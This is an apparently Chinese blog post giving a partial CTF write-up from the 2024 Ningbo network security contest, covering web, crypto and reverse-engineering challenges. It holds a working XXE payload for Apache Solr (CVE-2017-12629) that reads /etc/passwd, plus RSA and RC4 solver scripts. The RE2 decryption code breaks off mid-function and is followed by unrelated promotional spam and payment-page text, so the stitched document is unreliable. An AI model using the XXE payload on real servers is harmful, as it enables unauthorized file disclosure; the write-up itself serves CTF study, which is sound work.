2024“天一永安杯“宁波第七届网络安全大赛极安云科战队部分WP

image-20240505092359641

WEB1

BP直接抓到

image-20240505131223428

WEB2

XML注入:Apache solr XML 实体注入(CVE-2017-12629)

image-20240505131516560

payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

    <!ENTITY % expr 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>

CY1

import websocket
import json
from Crypto.Util.number import \*
from gmpy2 import \*

def get\_flag(ws):
    x = ""
    ws.send(json.dumps({"cmd": "get\_flag"}))
    while x == "" or x == "Pls send msgs and I'll return the result":
        x = ws.recv()
    return x

def f(ws, cmd, data):
    x = ""
    ws.send(json.dumps({"cmd": cmd, "data": data.zfill(512)}))
    while x == "" or x == "Pls send msgs and I'll return the result":
        x = ws.recv()
    return x

uri = "ws://xxx.xxx.xxx.xxx:xxxxx"
ws = websocket.create_connection(uri)
c = int(get_flag(ws), 16)
c2 = int(f(ws, "enc", hex(2)[2:]), 16)
c3 = int(f(ws, "enc", hex(3)[2:]), 16)
c4 = int(f(ws, "enc", hex(4)[2:]), 16)
c9 = int(f(ws, "enc", hex(9)[2:]), 16)
n = GCD(c2\*\*2 - c4, c3\*\*2 - c9)
enc_flag_2 = c2 \* c % n
flag_2 = int(f(ws, "dec", hex(enc_flag_2)[2:]), 16)
print(long_to_bytes(flag_2 // 2))


RE1

key和key1用crypto1算法混淆,再用cry2算法吧加密后的key混淆

def init(s, key1):
    key_length = len(key1)
    for i in range(256):
        s[i] = i
    j = 0
    for i in range(256):
        j = (j + s[i] + key1[i % key_length]) % 256
        s[i], s[j] = s[j], s[i]

def crypt1(s, key):
    v5 = 0
    v6 = 0
    encrypted_key = bytearray(key)
    for i in range(len(key)):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        s[v5], s[v6] = s[v6], s[v5]
        key_stream_byte = s[(s[v5] + s[v6]) % 256]
        encrypted_key[i] ^= key_stream_byte
    return encrypted_key

def before\_main(key, key1):
    s = list(range(256))
    init(s, key1)
    encrypted_key = crypt1(s, key)
    return encrypted_key
key1 = b"keykey" 
key = b"ban\_debug!" 
encrypted_key = before_main(key, key1)

print("Encrypted key:", encrypted_key)

def init(s, key):
    key_length = len(key)
    for i in range(256):
        s[i] = i
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % key_length]) % 256
        s[i], s[j] = s[j], s[i]

def crypt2(s, data):
    v5 = 0
    v6 = 0
    encrypted_data = bytearray(data)
    for i in range(len(data)):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        s[v5], s[v6] = s[v6], s[v5]
        key_stream_byte = s[(s[v5] + s[v6]) % 256]
        encrypted_data[i] = (encrypted_data[i] - key_stream_byte) % 256
    return encrypted_data

def decrypt2(s, cipher):
    decrypted_data = bytearray(cipher)
    v5 = 0
    v6 = 0
    for i in range(len(cipher)):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        s[v5], s[v6] = s[v6], s[v5]
        key_stream_byte = s[(s[v5] + s[v6]) % 256]
        decrypted_data[i] = (decrypted_data[i] + key_stream_byte) % 256
    return decrypted_data
key = b'key'
cipher = bytes([0x4e, 0x47, 0x38, 0x47, 0x62, 0x0a,  0x79, 0x6a, 0x03, 0x66, 0xc0, 0x69, 0x8d, 0x1c, 0x84, 0x0f, 0x54, 0x4a, 0x3b, 0x08, 0xe3, 0x30, 0x4f, 0xb9, 0x6c, 0xab, 0x36, 0x24, 0x52, 0x81, 0xcf])
s = list(range(256))
init(s, key)

decrypted_flag = decrypt2(s, cipher)
print("Decrypted flag:", decrypted_flag.decode())

第一个脚本得到加密flag的key,使用第二个脚本解出flag

RE2

修改UPX特征码后upx -d脱壳,IDA分析,rc4改了轮数

image-20240505131620532

并且key在加密之前修改了

image-20240505131656187

解密脚本

unsigned char sbox[size] = {0};
void init\_sbox(unsigned char \*key)
{
unsigned int i, j, k;
int tmp;
for (i = 0; i < size; i++)
{
## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/7fbc25563de7780afee4c0532c53f7f4.png)

![img](https://img-blog.csdnimg.cn/img_convert/dbae5a728f4e50d84809cbd462b184c9.png)

![img](https://img-blog.csdnimg.cn/img_convert/156fdc7f31d6d482f5227339ee7fff2c.png)

![img](https://img-blog.csdnimg.cn/img_convert/6faa490a47e9f212b0a3cf381d1c6ba5.png)

![img](https://img-blog.csdnimg.cn/img_convert/8d2bf78ed1998d9d35c27d64b5e1fdc1.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值